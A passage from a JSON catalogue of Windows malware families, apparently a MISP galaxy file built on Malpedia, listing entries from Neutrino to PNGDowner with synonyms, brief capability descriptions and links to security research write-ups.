"http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex" ], "synonyms": [ "Kasidet" ], "type": [] }, "uuid": "3760920e-4d1a-40d8-9e60-508079499076", "value": "Neutrino" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" ], "synonyms": [ "Jimmy" ], "type": [] }, "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", "value": "Neutrino POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" ], "synonyms": [], "type": [] }, "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", "value": "NewCore RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", "https://asert.arbornetworks.com/lets-talk-about-newposthings/", "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" ], "synonyms": [], "type": [] }, "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", "value": "NewPosThings" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", "value": "NewsReels" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" ], "synonyms": [ "CT" ], "type": [] }, "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", "value": "NewCT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot", "https://twitter.com/benkow_/status/789006720668405760" ], "synonyms": [], "type": [] }, "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", "value": "Nexster Bot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/", "https://twitter.com/PhysicalDrive0/status/842853292124360706" ], "synonyms": [], "type": [] }, "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", "value": "NexusLogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", "https://research.checkpoint.com/ramnits-network-proxy-servers/" ], "synonyms": [], "type": [] }, "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", "value": "Ngioweb" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove", "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html" ], "synonyms": [], "type": [] }, "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130", "value": "nitlove" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" ], "synonyms": [], "type": [] }, "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", "value": "Nitol" }, { "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services" ], "synonyms": [ "Bladabindi" ], "type": [] }, "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", "value": "NjRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer", "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" ], "synonyms": [], "type": [] }, "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", "value": "Nocturnal Stealer" }, { "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" ], "synonyms": [], "type": [] }, "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", "value": "Nokki" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" ], "synonyms": [], "type": [] }, "uuid": "6207668d-af17-44a6-97a2-e1b448264529", "value": "Nozelesn (Decryptor)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", "https://twitter.com/malwrhunterteam/status/910952333084971008", "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" ], "synonyms": [], "type": [] }, "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", "value": "nRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", "https://www.cert.pl/en/news/single/nymaim-revisited/", "https://bitbucket.org/daniel_plohmann/idapatchwork" ], "synonyms": [ "nymain" ], "type": [] }, "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", "value": "Nymaim" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2", "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" ], "synonyms": [], "type": [] }, "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", "value": "Nymaim2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" ], "synonyms": [], "type": [] }, "uuid": "01cef4e7-a8a8-4b42-b509-f91c5d415354", "value": "Oceansalt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus", "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" ], "synonyms": [], "type": [] }, "uuid": "777b76f9-5390-4899-b201-ebaa8a329c96", "value": "Octopus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" ], "synonyms": [], "type": [] }, "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", "value": "OddJob" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", "value": "Odinaff" }, { "description": "According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28.\r\nIt targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use both HTTP or SMTP to exfiltrate data.\r\nIn some places it is mistakenly named \"Sasfis\", which however seems to be a completely different and unrelated malware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait", "https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "https://www.secjuice.com/fancy-bear-review/" ], "synonyms": [ "Sasfis" ], "type": [] }, "uuid": "b79a6b61-f122-4823-a4ab-bbab89fcaf75", "value": "OLDBAIT" }, { "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", "https://securelist.com/the-devils-in-the-rich-header/84348/", "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", "https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/", "https://securelist.com/olympic-destroyer-is-still-alive/86169/", "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" ], "synonyms": [], "type": [] }, "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", "value": "Olympic Destroyer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", "https://twitter.com/malwrhunterteam/status/1001461507513880576" ], "synonyms": [], "type": [] }, "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", "value": "OneKeyLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" ], "synonyms": [], "type": [] }, "uuid": "82733125-da67-44ff-b2ac-b16226088211", "value": "ONHAT" }, { "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", "https://www.f-secure.com/weblog/archives/00002764.html", "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html" ], "synonyms": [], "type": [] }, "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", "value": "OnionDuke" }, { "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" ], "synonyms": [ "Onliner", "SBot" ], "type": [] }, "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", "value": "OnlinerSpambot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" ], "synonyms": [], "type": [] }, "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", "value": "OopsIE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", "https://forum.malekal.com/viewtopic.php?t=21806", "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html" ], "synonyms": [], "type": [] }, "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", "value": "Opachki" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" ], "synonyms": [], "type": [] }, "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", "value": "OpGhoul" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" ], "synonyms": [], "type": [] }, "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", "value": "OpBlockBuster" }, { "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" ], "synonyms": [], "type": [] }, "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", "value": "OrcaRAT" }, { "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", "https://orcustechnologies.com/" ], "synonyms": [], "type": [] }, "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", "value": "Orcus RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/", "https://www.gdata.de/blog/2017/11/30151-ordinypt" ], "synonyms": [], "type": [] }, "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", "value": "Ordinypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" ], "synonyms": [], "type": [] }, "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", "value": "Overlay RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" ], "synonyms": [], "type": [] }, "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", "value": "OvidiyStealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" ], "synonyms": [ "luckyowa" ], "type": [] }, "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", "value": "owaauth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/", "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/" ], "synonyms": [], "type": [] }, "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", "value": "PadCrypt" }, { "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" ], "synonyms": [], "type": [] }, "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", "value": "paladin" }, { "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", "https://www.spamhaus.org/news/article/771/", "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" ], "synonyms": [ "ZeusPanda" ], "type": [] }, "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", "value": "PandaBanker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" ], "synonyms": [], "type": [] }, "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", "value": "parasite_http" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" ], "synonyms": [], "type": [] }, "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", "value": "Penco" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" ], "synonyms": [], "type": [] }, "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", "value": "PetrWrap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/", "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", "value": "Petya" }, { "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", "https://community.fireeye.com/external/1093" ], "synonyms": [ "ReRol" ], "type": [] }, "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", "value": "pgift" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor", "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" ], "synonyms": [], "type": [] }, "uuid": "3a77d0d4-6fb1-4092-9fe3-bf1f51a6677c", "value": "PhanDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/", "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/" ], "synonyms": [], "type": [] }, "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", "value": "Philadephia Ransom" }, { "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", "https://www.johannesbader.ch/2016/02/phorpiex/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" ], "synonyms": [ "Trik" ], "type": [] }, "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", "value": "Phorpiex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", "https://www.snort.org/rule_docs/1-26941" ], "synonyms": [], "type": [] }, "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", "value": "pipcreat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" ], "synonyms": [], "type": [] }, "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", "value": "pirpi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" ], "synonyms": [], "type": [] }, "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", "value": "Pitou" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/" ], "synonyms": [], "type": [] }, "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", "value": "PittyTiger RAT" }, { "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", "http://blog.kleissner.org/?p=788", "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" ], "synonyms": [ "Bublik", "Pykbot", "TBag" ], "type": [] }, "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", "value": "Pkybot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", "value": "PLAINTEE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" ], "synonyms": [], "type": [] }, "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", "value": "playwork" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", "http://www.freebuf.com/column/159865.html", "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html", "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf" ], "synonyms": [ "TSCookie" ], "type": [] }, "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", "value": "PLEAD" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" ], "synonyms": [], "type": [] }, "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", "value": "Plexor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" ], "synonyms": [], "type": [] }, "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", "value": "Ploutus ATM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" ], "synonyms": [], "type": [] }, "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", "value": "ployx" }, { "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://community.rsa.com/thread/185439", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", "https://securelist.com/time-of-death-connected-medicine/84315/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf" ], "synonyms": [ "Korplug" ], "type": [] }, "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", "value": "PlugX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" ], "synonyms": [], "type": 